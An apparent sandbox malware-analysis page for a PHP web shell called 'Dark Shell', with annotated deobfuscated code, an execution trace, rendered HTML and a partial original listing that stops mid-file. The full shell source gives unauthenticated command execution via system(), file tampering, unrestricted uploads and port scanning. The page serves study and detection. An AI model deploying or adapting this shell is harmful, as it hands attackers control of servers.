PHP Malware Analysis

1.php

md5: e0c9c52563cb6a44c9eca041533cbc97


Screenshot


Attributes

Environment

Execution

Files

Input


Deobfuscated PHP code

<html>
<head>
<title>

</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php 
// Analyst annotation: comments only; the code is the deobfuscated sample as published.
// Single-file web shell. Nothing in this listing checks a password, session or
// source address, so any client that can reach the file gets every feature below.

// Turn off PHP error reporting so failed operations leave no warnings in the response.
error_reporting(0);
// Request no execution time limit (the sandbox trace on this page records FALSE as the return value).
set_time_limit(0);
// The working directory comes from the "dir" query parameter when it is present,
// otherwise from the directory the script runs in. The value is used unvalidated.
if (empty($_GET['dir'])) {
    $dir = getcwd();
} else {
    $dir = $_GET['dir'];
}
chdir($dir);
// Base URL for every link and form the shell prints: script path plus "?dir=<dir>".
// This is the only request-derived value the script HTML-encodes; file names and
// the other parameters are echoed raw further down.
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
// Static banner followed by host name, working directory and server software string.
// The literal "Dark Shell" heading is a fixed string in every response body.
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd() . "<br>\n";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";
// Menu linking to the system, create, upload and port_scan modes.
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '" . $current . "&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '" . $current . "&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";
// Dispatcher input: the "mode" query parameter selects the operation to run.
$mode = $_GET['mode'];
// Analyst annotation: comments only; the code is the deobfuscated sample as published.
// Mode dispatcher. Target paths arrive in the query string and new values in the POST
// body; none of them is validated or confined to a directory. In access logs the
// activity therefore shows up as requests to one script with a "mode=" query
// parameter, while POST bodies are normally not logged.
switch ($mode) {
    // edit: without POST "new" the target file is read and shown in a form;
    // with POST "new" the file is overwritten with the submitted text.
    case 'edit':
        $file = $_GET['file'];
        $new = $_POST['new'];
        if (empty($new)) {
            // The fopen() result is not checked before it is used.
            $fp = fopen($file, "r");
            $file_cont = fread($fp, filesize($file));
            // As shown, search and replacement strings are identical, so this call changes nothing.
            // NOTE(review): possibly an entity-encoded replacement that was decoded when the page was rendered; confirm against the raw sample.
            $file_cont = str_replace("<textarea>", "<textarea>", $file_cont);
            echo "<form action = '" . $current . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
            echo "File: " . $file . "<br>\n";
            // The file content is echoed without HTML encoding, and the element is followed
            // by a second opening <textarea> tag rather than a closing one.
            echo "<textarea name = 'new' rows = '30' cols = '50'>" . $file_cont . "<textarea><br>\n";
            echo "<input type = 'submit' value = 'Edit'></form>\n";
        } else {
            // Mode "w" truncates the target before writing.
            $fp = fopen($file, "w");
            if (fwrite($fp, $new)) {
                echo $file . " edited.<p>";
            } else {
                echo "Unable to edit " . $file . ".<p>";
            }
        }
        fclose($fp);
        break;
    // delete: removes the file named in the "file" query parameter.
    case 'delete':
        $file = $_GET['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    // copy: source from the query string, destination from the POST body.
    case 'copy':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    // move: same inputs as copy, implemented with rename().
    case 'move':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    // rename: old name from the query string, new name from the POST body; used for files and directories.
    case 'rename':
        $old = $_GET['old'];
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;
    // rmdir: removes the directory named in the "rm" query parameter.
    case 'rmdir':
        $rm = $_GET['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    // system: the POST "cmd" value is handed to system() unchanged, which is operating-system
    // command execution with the privileges of the PHP process. system() writes the
    // command output directly into the response. A PHP configuration that lists system in
    // disable_functions makes this branch fail; the file operations above are unaffected by that.
    case 'system':
        $cmd = $_POST['cmd'];
        if (empty($cmd)) {
            echo "<form action = '" . $current . "&mode=system' method = 'POST'>\n";
            echo "Shell Command: <input name = 'cmd'>\n";
            echo "<input type = 'submit' value = 'Run'></form><p>\n";
        } else {
            system($cmd);
        }
        break;
    // create: creates (or truncates) the file named in POST "new".
    case 'create':
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=create' method = 'POST'>\n";
            echo "<tr><td>New file: <input name = 'new'></td>\n";
            echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
        } else {
            if ($fp = fopen($new, "w")) {
                echo "File created successfully.<p>\n";
            } else {
                // $file is never assigned in this branch, so the failure message carries no name.
                echo "Unable to create " . $file . ".<p>\n";
            }
            // Runs on the failure path as well, where $fp is false.
            fclose($fp);
        }
        break;
    // upload: stores the uploaded file in the current working directory under the base name
    // sent by the client. No check on extension, type or content is made, so the web root
    // can receive further executable files through this branch.
    case 'upload':
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (empty($file)) {
            echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
            echo "Local file: <input type = 'file' name = 'upload_file'>\n";
            echo "<input type = 'submit' value = 'Upload'>\n";
            echo "</form>\n<pre>\n\n</pre>";
        } else {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                // The temporary file has just been moved, so this unlink() has nothing left to remove.
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
    // port_scan: tries a TCP connection to each port in the POSTed "from:to" range.
    // The host is hard-coded to localhost, i.e. the compromised server itself.
    case 'port_scan':
        $port_range = $_POST['port_range'];
        if (empty($port_range)) {
            echo "<table><form action = '" . $current . "&mode=port_scan' method = 'POST'>";
            echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
            echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
            echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
        } else {
            $range = explode(":", $port_range);
            // Only numeric-ness is checked; the bounds themselves are not limited.
            if (!is_numeric($range[0]) or !is_numeric($range[1])) {
                echo "Bad parameters.<br>";
            } else {
                $host = 'localhost';
                $from = $range[0];
                $to = $range[1];
                echo "Open ports:<br>";
                while ($from <= $to) {
                    $var = 0;
                    // "or" binds more loosely than "=", so $var becomes 1 only when fsockopen() fails.
                    $fp = fsockopen($host, $from) or $var = 1;
                    // NOTE(review): the "Original PHP code" section of this page has `if ($var == 0)` here.
                    // The constant `false` looks like a deobfuscator artefact; in the original,
                    // ports that accept a connection are printed.
                    if (false) {
                        echo $from . "<br>";
                    }
                    $from++;
                    // Called after failed connections too, where $fp is false.
                    fclose($fp);
                }
            }
        }
        break;
}
// Analyst annotation: comments only; the code is the deobfuscated sample as published.
// Directory listing. This part runs on every request, whatever the mode, so even a
// plain GET of the script enumerates the working directory (the scandir/is_file/filesize
// calls in the execution trace on this page come from here).
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
    // Names are relative; they resolve against the directory set by the earlier chdir().
    if (is_file($file)) {
        // Regular file: size in KB plus one link per file operation.
        // File names are written into the markup unescaped and the href values are unquoted.
        $size = round(filesize($file) / 1024, 2);
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $size . " KB</td>";
        echo "<td><a href = " . $current . "&mode=edit&file=" . $file . ">Edit</a></td>\n";
        echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>\n";
        echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>\n";
        echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>\n";
        // The misspelt label "Remame" is part of the sample and appears verbatim in its output.
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>\n";
    } else {
        // Everything that is not a regular file is treated as a directory.
        // The item count subtracts the "." and ".." entries.
        $items = scandir($file);
        $items_num = count($items) - 2;
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $items_num . " Items</td>";
        // "Change directory" extends the dir parameter by appending "/<name>" to the base URL.
        echo "<td><a href = " . $current . "/" . $file . ">Change directory</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>\n";
    }
}
echo "</table>\n";
// The markup that follows the closing PHP tag is static text stored in the sample and is
// sent as-is on every request. It has the same row format as the listing above and names
// a different script path and a Windows directory, so it appears to be shell output that
// was saved into the file on another host (NOTE(review): inferred from the content; confirm).
?><textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>

</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>

Execution traces

data/traces/e0c9c52563cb6a44c9eca041533cbc97_trace-1676255233.6491.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:39.546961]
1	0	1	0.000150	393464
1	3	0	0.000411	438264	{main}	1		/var/www/html/uploads/1.php	0	0
2	4	0	0.000429	438264	error_reporting	0		/var/www/html/uploads/1.php	30	1	0
2	4	1	0.000444	438304
2	4	R			22527
2	5	0	0.000458	438264	set_time_limit	0		/var/www/html/uploads/1.php	31	1	0
2	5	1	0.000473	438328
2	5	R			FALSE
2	6	0	0.000488	438296	getcwd	0		/var/www/html/uploads/1.php	33	0
2	6	1	0.000501	438344
2	6	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	33	$dir = '/var/www/html/uploads'
2	7	0	0.000529	438344	chdir	0		/var/www/html/uploads/1.php	38	1	'/var/www/html/uploads'
2	7	1	0.000544	438432
2	7	R			TRUE
2	8	0	0.000558	438472	htmlentities	0		/var/www/html/uploads/1.php	39	1	'/uploads/1.php?dir=/var/www/html/uploads'
2	8	1	0.000574	438664
2	8	R			'/uploads/1.php?dir=/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	39	$current = '/uploads/1.php?dir=/var/www/html/uploads'
2	9	0	0.000603	438552	getcwd	0		/var/www/html/uploads/1.php	43	0
2	9	1	0.000615	438600
2	9	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	58	$mode = NULL
2	10	0	0.000645	438552	clearstatcache	0		/var/www/html/uploads/1.php	235	0
2	10	1	0.000657	438552
2	10	R			NULL
2	11	0	0.000670	438552	scandir	0		/var/www/html/uploads/1.php	239	1	'/var/www/html/uploads'
2	11	1	0.000701	439168
2	11	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	239	$files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2	12	0	0.000739	439136	is_file	0		/var/www/html/uploads/1.php	241	1	'.'
2	12	1	0.000754	439184
2	12	R			FALSE
2	13	0	0.000767	439144	scandir	0		/var/www/html/uploads/1.php	253	1	'.'
2	13	1	0.000789	439760
2	13	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	253	$items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	254	$items_num = 4
2	14	0	0.000836	439728	is_file	0		/var/www/html/uploads/1.php	241	1	'..'
2	14	1	0.000851	439768
2	14	R			FALSE
2	15	0	0.000864	439728	scandir	0		/var/www/html/uploads/1.php	253	1	'..'
2	15	1	0.000888	440232
2	15	R			[0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/1.php	253	$items = [0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/1.php	254	$items_num = 1
2	16	0	0.000950	439616	is_file	0		/var/www/html/uploads/1.php	241	1	'.htaccess'
2	16	1	0.000966	439664
2	16	R			TRUE
2	17	0	0.000979	439624	filesize	0		/var/www/html/uploads/1.php	243	1	'.htaccess'
2	17	1	0.000992	439664
2	17	R			64
2	18	0	0.001005	439624	round	0		/var/www/html/uploads/1.php	243	2	0.0625	2
2	18	1	0.001019	439696
2	18	R			0.06
1		A						/var/www/html/uploads/1.php	243	$size = 0.06
2	19	0	0.001046	439624	is_file	0		/var/www/html/uploads/1.php	241	1	'1.php'
2	19	1	0.001060	439656
2	19	R			TRUE
2	20	0	0.001073	439616	filesize	0		/var/www/html/uploads/1.php	243	1	'1.php'
2	20	1	0.001085	439656
2	20	R			9903
2	21	0	0.001098	439616	round	0		/var/www/html/uploads/1.php	243	2	9.6708984375	2
2	21	1	0.001110	439688
2	21	R			9.67
1		A						/var/www/html/uploads/1.php	243	$size = 9.67
2	22	0	0.001136	439616	is_file	0		/var/www/html/uploads/1.php	241	1	'data'
2	22	1	0.001150	439656
2	22	R			FALSE
2	23	0	0.001163	439616	scandir	0		/var/www/html/uploads/1.php	253	1	'data'
2	23	1	0.001186	440144
2	23	R			[0 => '.', 1 => '..', 2 => 'trace-1676255233.6491.xt.gz']
1		A						/var/www/html/uploads/1.php	253	$items = [0 => '.', 1 => '..', 2 => 'trace-1676255233.6491.xt.gz']
1		A						/var/www/html/uploads/1.php	254	$items_num = 1
2	24	0	0.001230	439640	is_file	0		/var/www/html/uploads/1.php	241	1	'prepend.php'
2	24	1	0.001245	439688
2	24	R			TRUE
2	25	0	0.001257	439648	filesize	0		/var/www/html/uploads/1.php	243	1	'prepend.php'
2	25	1	0.001270	439688
2	25	R			57
2	26	0	0.001283	439648	round	0		/var/www/html/uploads/1.php	243	2	0.0556640625	2
2	26	1	0.001302	439720
2	26	R			0.06
1		A						/var/www/html/uploads/1.php	243	$size = 0.06
1	3	1	0.001334	439760
			0.001362	315752
TRACE END   [2023-02-13 00:27:39.548205]


Generated HTML code

<html><head>
<title>

</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<center><h1>Dark Shell</h1></center><p></p><hr><p>
<i>Server: localhost<br>
Current directory: /var/www/html<br>
Software: Apache/2.4.52 (Ubuntu)</i></p><pre><i>
</i></pre>
<pre>

</pre><table width="50%"><tbody><tr><td><a href="/1.php?dir=/var/www/html&amp;mode=system">Shell Command</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=create">Create a new file</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=upload">Upload file</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=port_scan">Port Scan</a></td>
</tr></tbody></table><pre>
</pre><pre>
</pre><table width="100%">
<tbody><tr><td>.</td><td>2 Items</td><td><a href="/1.php?dir=/var/www/html/.">Change directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=.">Remove directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=.">Rename directory</a></td></tr>
<tr><td>..</td><td>2 Items</td><td><a href="/1.php?dir=/var/www/html/..">Change directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=..">Remove directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=..">Rename directory</a></td></tr>
<tr><td>1.php</td><td>9.67 KB</td><td><a href="/1.php?dir=/var/www/html&amp;mode=edit&amp;file=1.php">Edit</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=delete&amp;file=1.php">Delete</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=copy&amp;src=1.php">Copy</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=move&amp;src=1.php">Move</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=1.php">Remame</a></td></tr>
<tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/1.php?dir=/var/www/html&amp;mode=edit&amp;file=beneri.se_malware_analysis">Edit</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=delete&amp;file=beneri.se_malware_analysis">Delete</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=copy&amp;src=beneri.se_malware_analysis">Copy</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=move&amp;src=beneri.se_malware_analysis">Move</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=beneri.se_malware_analysis">Remame</a></td></tr>
</tbody></table>
<textarea>&lt;br&gt;
&lt;input type = 'submit' value = 'Edit'&gt;&lt;/form&gt;
&lt;pre&gt;

&lt;/pre&gt;&lt;table width = 100%&gt;
&lt;tr&gt;&lt;td&gt;.&lt;/td&gt;&lt;td&gt;3 Items&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.&gt;Change directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rmdir&amp;rm=.&gt;Remove directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=.&gt;Rename directory&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;..&lt;/td&gt;&lt;td&gt;40 Items&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..&gt;Change directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rmdir&amp;rm=..&gt;Remove directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=..&gt;Rename directory&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;dede-maketimehtml.php&lt;/td&gt;&lt;td&gt;0.23 KB&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=edit&amp;file=dede-maketimehtml.php&gt;Edit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=delete&amp;file=dede-maketimehtml.php&gt;Delete&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=copy&amp;src=dede-maketimehtml.php&gt;Copy&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=move&amp;src=dede-maketimehtml.php&gt;Move&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=dede-maketimehtml.php&gt;Remame&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;dede-maketimehtmls.php&lt;/td&gt;&lt;td&gt;6.58 KB&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=edit&amp;file=dede-maketimehtmls.php&gt;Edit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=delete&amp;file=dede-maketimehtmls.php&gt;Delete&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=copy&amp;src=dede-maketimehtmls.php&gt;Copy&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=move&amp;src=dede-maketimehtmls.php&gt;Move&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=dede-maketimehtmls.php&gt;Remame&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;dede-optimize-table.php&lt;/td&gt;&lt;td&gt;0.24 KB&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=edit&amp;file=dede-optimize-table.php&gt;Edit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=delete&amp;file=dede-optimize-table.php&gt;Delete&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=copy&amp;src=dede-optimize-table.php&gt;Copy&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=move&amp;src=dede-optimize-table.php&gt;Move&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=dede-optimize-table.php&gt;Remame&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
</textarea></body></html>

Original PHP code

<html>
<head>
<title>

</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
// Analyst annotation: comments only; the code below is the sample as published.
// Single-file web shell with no password, session or source-address check anywhere in
// the listing: whoever can request the file can use every feature.

// Error reporting off and no execution time limit requested.
error_reporting (0);
set_time_limit (0);
// Working directory: the unvalidated "dir" query parameter, or the script's own directory.
if (empty ($_GET ['dir'])){
$dir = getcwd ();
}
else {
$dir = $_GET ['dir'];
}
chdir ($dir);
// Base URL used in every generated link and form; the only request-derived value that is HTML-encoded.
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

// Fixed "Dark Shell" banner, then host name, working directory and server software string.
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd () . "<br>\n";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";

// Menu linking to the system, create, upload and port_scan modes.
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";



// The "mode" query parameter selects the operation to run.
$mode = $_GET ['mode'];
// Analyst annotation: comments only; the code below is the sample as published.
// Mode dispatcher. Paths come from the query string, new values from the POST body,
// and nothing is validated or restricted to a directory.
switch ($mode){
// edit: show the target file in a form, or overwrite it when POST "new" is present.
case 'edit':
$file = $_GET ['file'];
$new = $_POST ['new'];
if (empty ($new)){
// fopen() result is used without a check.
$fp = fopen ($file, "r");
$file_cont = fread ($fp, filesize ($file));
// Search and replacement strings are identical as shown, so this is a no-op.
// NOTE(review): may be a rendering artefact of the page; confirm against the raw sample.
$file_cont = str_replace ("<textarea>", "<textarea>", $file_cont);
echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
echo "File: ". $file . "<br>\n";
// File content is echoed unencoded and followed by an opening, not a closing, <textarea> tag.
echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."<textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
}
else {
// Mode "w" truncates the file before the new content is written.
$fp = fopen ($file, "w");
